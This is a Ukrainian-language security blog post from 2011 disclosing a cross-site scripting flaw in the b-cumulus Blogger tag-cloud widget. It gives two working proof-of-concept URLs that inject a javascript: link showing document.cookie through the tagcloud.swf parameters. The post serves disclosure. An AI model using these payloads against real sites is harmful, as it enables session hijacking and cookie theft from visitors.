Уразливість в b-cumulus

23:55 17.01.2011

Раніше я вже писав про уразливість у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків. Така ж уразливість є і в b-cumulus (віджеті для Blogger, що також використовується на окремих сайтах), що використовує модифіковану версію tagcloud.swf розроблену автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Нещодавно, 15.01.2011, я знайшов Cross-Site Scripting уразливість в b-cumulus. Про що найближчим часом повідомлю розробнику.

XSS:

Використовуватися може файл tagcloud.swf або tagcloud-ru.swf.

http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії b-cumulus.


Leave a Reply

You must be logged in to post a comment.